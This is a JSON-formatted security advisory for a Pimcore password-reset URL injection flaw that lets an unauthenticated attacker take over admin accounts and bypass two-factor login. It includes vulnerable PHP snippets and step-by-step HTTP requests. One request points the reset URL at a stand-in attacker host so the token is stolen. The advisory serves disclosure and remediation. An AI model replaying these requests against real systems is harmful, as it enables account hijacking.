{"id":"CVE-2026-55207","aliases":["GHSA-h854-c3m3-mh5v"],"title":"Pimcore: Account Takeover via Password Reset URL Injection allows unauthenticated attacker to hijack any admin account with 2FA bypass","summary":"Pimcore: Account Takeover via Password Reset URL Injection allows unauthenticated attacker to hijack any admin account with 2FA bypass","severity":"high","cvss":8.8,"cwe":["CWE-640"],"vendor":"pimcore","product":"pimcore/studio-backend-bundle","ecosystem":"composer","affected":["pimcore/studio-backend-bundle < 2025.4.6","pimcore/studio-backend-bundle >= 2026.1.0, < 2026.1.6"],"patched":["pimcore/studio-backend-bundle 2025.4.6","pimcore/studio-backend-bundle 2026.1.6"],"published":"2026-08-28","updated":"2026-08-28","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-h854-c3m3-mh5v","references":[{"url":"https://github.com/pimcore/pimcore/security/advisories/GHSA-h854-c3m3-mh5v"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-55207"},{"url":"https://github.com/pimcore/studio-backend-bundle/pull/1882"},{"url":"https://github.com/pimcore/studio-backend-bundle/commit/ea9d329686f5e5aea2eec378d63ac2deb965bb27"},{"url":"https://github.com/pimcore/studio-backend-bundle/releases/tag/v2025.4.6"},{"url":"https://github.com/pimcore/studio-backend-bundle/releases/tag/v2026.1.6"},{"url":"https://github.com/advisories/GHSA-h854-c3m3-mh5v"}],"tags":["ghsa","composer"],"epss":0.00666,"epssPercentile":0.50375,"ingestedAt":"2026-08-28T19:24:18.904Z","slug":"CVE-2026-55207","body":"## Overview\n\n## Summary\n\nAn unauthenticated attacker takes over any Pimcore admin account by sending a password reset request with an attacker-controlled `resetPasswordUrl`. The server generates a real cryptographic recovery token, appends it to the attacker's URL, and emails the link to the victim. When the victim clicks the link in their email, the token is sent to the attacker's server. The attacker then uses `POST /pimcore-studio/api/login/token` to authenticate as the victim with full admin privileges. Token login explicitly disables two-factor authentication, so even accounts with TOTP/Google Authenticator are compromised.\n\n## Vulnerability Details\n\n### Unauthenticated Endpoint Accepts Attacker URL\n\nThe reset password endpoint at `src/User/Controller/ResetPasswordController.php` line 53 is public (uses `PUBLIC_STUDIO_API` voter). The `ResetPassword` schema at `src/User/Schema/ResetPassword.php` accepts a `resetPasswordUrl` string as a required parameter with zero validation. No URL scheme check, no domain allowlist, no comparison against the configured system domain.\n\n```php\nfinal readonly class ResetPassword\n{\n    public function __construct(\n        private string $username,\n        private string $resetPasswordUrl  // attacker-controlled, no validation\n    ) {}\n}\n```\n\n### Token Appended to Attacker URL\n\nIn `src/User/Service/UserLoginService.php` at line 64-65, the service generates a real recovery token and concatenates the attacker's URL with the token:\n\n```php\n$token = $this->authenticationResolver->generateTokenByUser($user);\n$loginUrl = $resetPassword->getResetPasswordUrl() . '?token=' . $token;\n```\n\nThe token is generated and stored in the database BEFORE `sendResetPasswordMail()` is called on line 68. Even if email delivery fails, the token exists.\n\n### Token Login Bypasses 2FA\n\n`src/Security/Authenticator/AdminTokenAuthenticator.php` line 60 explicitly disables 2FA on token login:\n\n```php\n$pimcoreUser->setTwoFactorAuthentication('required', false);\n```\n\n### Token Validity\n\nThe token is encrypted with the application secret, valid for 24 hours, and single-use (nullified after authentication). The attacker's server captures it before the victim completes any reset flow.\n\n## Steps to Reproduce\n\nTested on Pimcore 12.x (2026.x branch, latest commit `82f9ff6`), Docker, PHP 8.4.\n\n### 1. Send password reset with attacker URL (no authentication needed)\n\n```http\nPOST /pimcore-studio/api/user/reset-password HTTP/1.1\nHost: TARGET\nContent-Type: application/json\n\n{\"username\":\"admin\",\"resetPasswordUrl\":\"https://ATTACKER_SERVER:9999/steal\"}\n```\n<img width=\"1756\" height=\"882\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9cb90c8e-6c08-4cd6-980a-822bbd35dc23\" />\n\n- Response: 500 (email delivery failed in test env, but token def5020020bd133... visible in error trace, confirmed generated in DB\n\n### 2. Confirm token was generated\n\nDatabase query shows the recovery token was created:\n\n```\n name    has_token   token_prefix\n admin   1           def50200cdbd3c1292288a716c623f\n```\n\n### 3. Token login (after victim clicks the link in their email)\n\n```http\nPOST /pimcore-studio/api/login/token HTTP/1.1\nHost: TARGET\nContent-Type: application/json\n\n{\"token\":\"def50200cdbd3c1292288a716c623f...full_token...\"}\n```\n\n**Response:**\n\n```\nHTTP/1.1 200 OK\nSet-Cookie: PHPSESSID=48d784c5bfcc09c8b897f2ab34038419; path=/; httponly; samesite=strict\nSet-Cookie: pimcore_studio_auth_profile_token=d7a9ad; path=/; httponly; samesite=lax\n```\n<img width=\"1756\" height=\"679\" alt=\"image\" src=\"https://github.com/user-attachments/assets/53bf8f30-47c1-4398-b386-9929b77a35b5\" />\n\n### 4. Verify full admin access with the stolen session\n\n```http\nGET /pimcore-studio/api/users HTTP/1.1\nHost: TARGET\nCookie: PHPSESSID=48d784c5bfcc09c8b897f2ab34038419\n```\n\n**Response:** `HTTP/1.1 200 OK`\n\n```json\n{\"totalItems\":1,\"items\":[{\"id\":1,\"username\":\"admin\",\"additionalAttributes\":[]}]}\n```\n<img width=\"1668\" height=\"906\" alt=\"image\" src=\"https://github.com/user-attachments/assets/8f2b63b0-6357-4fe6-9689-35eb891de5ab\" />\n\nFull admin session obtained. All CMS content, assets, PIM data, user accounts, and system configuration are accessible.\n\n## Impact\n\nAn unauthenticated attacker who knows a valid admin username takes over the account with full administrative privileges. The only user interaction is the victim clicking a password reset link in a legitimate email from the Pimcore instance. The email comes from the real Pimcore server, making it indistinguishable from a genuine reset email.\n\nThe attack bypasses authentication (public endpoint), two-factor authentication (explicitly disabled on token login), and rate limiting (allows 3 attempts per window, trivially worked around with multiple IPs).\n\nOnce authenticated as admin, the attacker controls all CMS content, digital assets, PIM product data, user accounts, system configuration, and server-side code execution via class definitions.\n\n## Recommended Fix\n\nRemove the `resetPasswordUrl` parameter entirely and construct the URL server-side from the configured system domain:\n\n```php\n$loginUrl = 'https://' . $this->domain . '/admin/login?token=' . $token;\n```\n\nIf the frontend needs to specify the URL for multi-domain setups, validate the host against the configured domain and any registered Site domains.\n\n## Supporting Materials\n\n- Live-tested on Pimcore 12.x (2026.x branch, Docker, PHP 8.4)\n- Package: `pimcore/studio-backend-bundle`\n- Distinct from CVE-2021-39189 (user enumeration in password reset, not URL injection)\n\n## Affected packages\n\n- `pimcore/studio-backend-bundle < 2025.4.6`\n- `pimcore/studio-backend-bundle >= 2026.1.0, < 2026.1.6`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `pimcore/studio-backend-bundle 2025.4.6`\n- `pimcore/studio-backend-bundle 2026.1.6`","depth":"twilight","depthScore":49,"depthScoreParts":{"impact":48.4,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}